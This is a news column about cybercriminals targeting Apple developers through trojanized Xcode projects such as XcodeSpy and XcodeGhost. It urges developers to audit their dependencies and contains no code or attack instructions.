Hackers target developers to break into Apple’s garden

Developers should beware, as cybercriminals have figured out that the best attack vectors to infect the Apple ecosystem may be the developers themselves.

Developers, developers, malware writers

We’ve known for a long time that malware makers and other cyber-miscreants are smart. The work they do brings in real money, with a healthy trade in corporate and personal secrets, bank account details, fraud, and ransomware generating a market some say is already worth billions — even as it costs the global economy 1% of GDP.

You can argue about the economic consequences, but there’s little doubt that the move to remote working generated a spike in socially engineered attacks, from fraudulent websites to phishing and beyond. And while the Apple ecosystem has held up well, with the majority of serious incidents stemming from weak user security practises and successful manipulation using traditional attack vectors such as malware-infested emails and website links, the pandemic has also seen the value of that ecosystem grow.

Apple is a tempting target

With 23% of enterprise PCs deployed in 2020 apparently being Macs, Apple’s platforms are becoming keen targets for criminal enterprise. The problem for criminals: Apple’s inherently solid security, along with the capacity to rush security upgrades out to millions of users because of the company’s non-fragmented platforms, makes doing so quite difficult.

In response, attackers appear to be returning to the drawing board and now seem to be working to inject attacks early on in the process. The way they see it is that if you can’t persuade people to download Apple malware, you need to inject it inside applications users already trust.

XcodeSpy targets developers

The latest illustration of this (“XcodeSpy”) has been identified by a team of security researchers at SentinelOne. They claim to have found an infected code library in the wild that attempts to install malware on Macs used by software developers. It comes as a copy of a legitimate open-source project Xcode users might choose to build animated tab bars.

Once installed, this software quietly executes a script that downloads backdoor software that monitors what the developer does via the microphone, camera and keyboard.

While this sounds pretty rough, it’s no reason for over-reaction. But it should serve as a warning to Apple developers in all walks of life, (particularly in enterprise IT) to ensure they are completely certain of what third-party tools and open-source packages they use when building applications.

A rich history of developer attack

ArsTechnica notes another recent incident of malware aimed at developers, when what were thought to be state-sponsored hackers engaged in an extensive campaign to win trust from security researchers via social media to convince them to install malware.

In a sense, the shape of this particular set of security adventures was set in 2015 when hackers introduced XcodeGhost, a version of Apple’s developer tool that was given a little extra zing in the form of built-in malware. Apps built using XcodeGhost all shipped with malware installed. While this attack was mostly confined to the APAC region, it took months for apps containing code built by XCodeGhost to stop circulating.  

The logic here makes complete sense. Even in Apple’s curated App Store model, iPhone, iPad, and Mac customers have built a big sense of trust in the way they download and install software.

Indeed given that Apple continues to add friction to the experience of downloading software from outside its stores, malware makers know that the best way to distribute their wares is via the App Store itself.

This must ultimately be the prize they seek — to build an attack mechanism that silently infects enough developers of legitimate Apple apps so that the apps they then sell via Apple’s store carry malware into devices belonging to millions of users.

Developers are targets, too

This hasn’t happened yet, and I think that Apple’s store security, software code checking, and verification tools mean it may never happen at all. But this is certainly part of what Apple’s customers and developers pay for in their App Store distribution fees.

What makes this of a little more concern is that this latest alert follows just months after TrendMicro warned of a similar attempt to undermine Xcode, again by targeting developers.

The bottom line?

Apple’s highly secure platforms are tough to break, but there’s a big profit motive to try to do so.

Given that the weakest link in any security chain is now and always has been the user, no surprise then that those with a nose for this kind of security subversion are spending time figuring out how to trick developers into unwittingly becoming their own secret attack vectors.

I think this means developers in the Apple ecosystem will need to security audit their software code repositories a little more often in future. Because you have been identified as potentially being the weakest link in the security chain.

It would also be a good time to review Apple’s security white papers and this (older, but still useful) Mac security guide.

Please follow me on Twitter, or join me in the AppleHolic’s bar & grill and Apple Discussions groups on MeWe.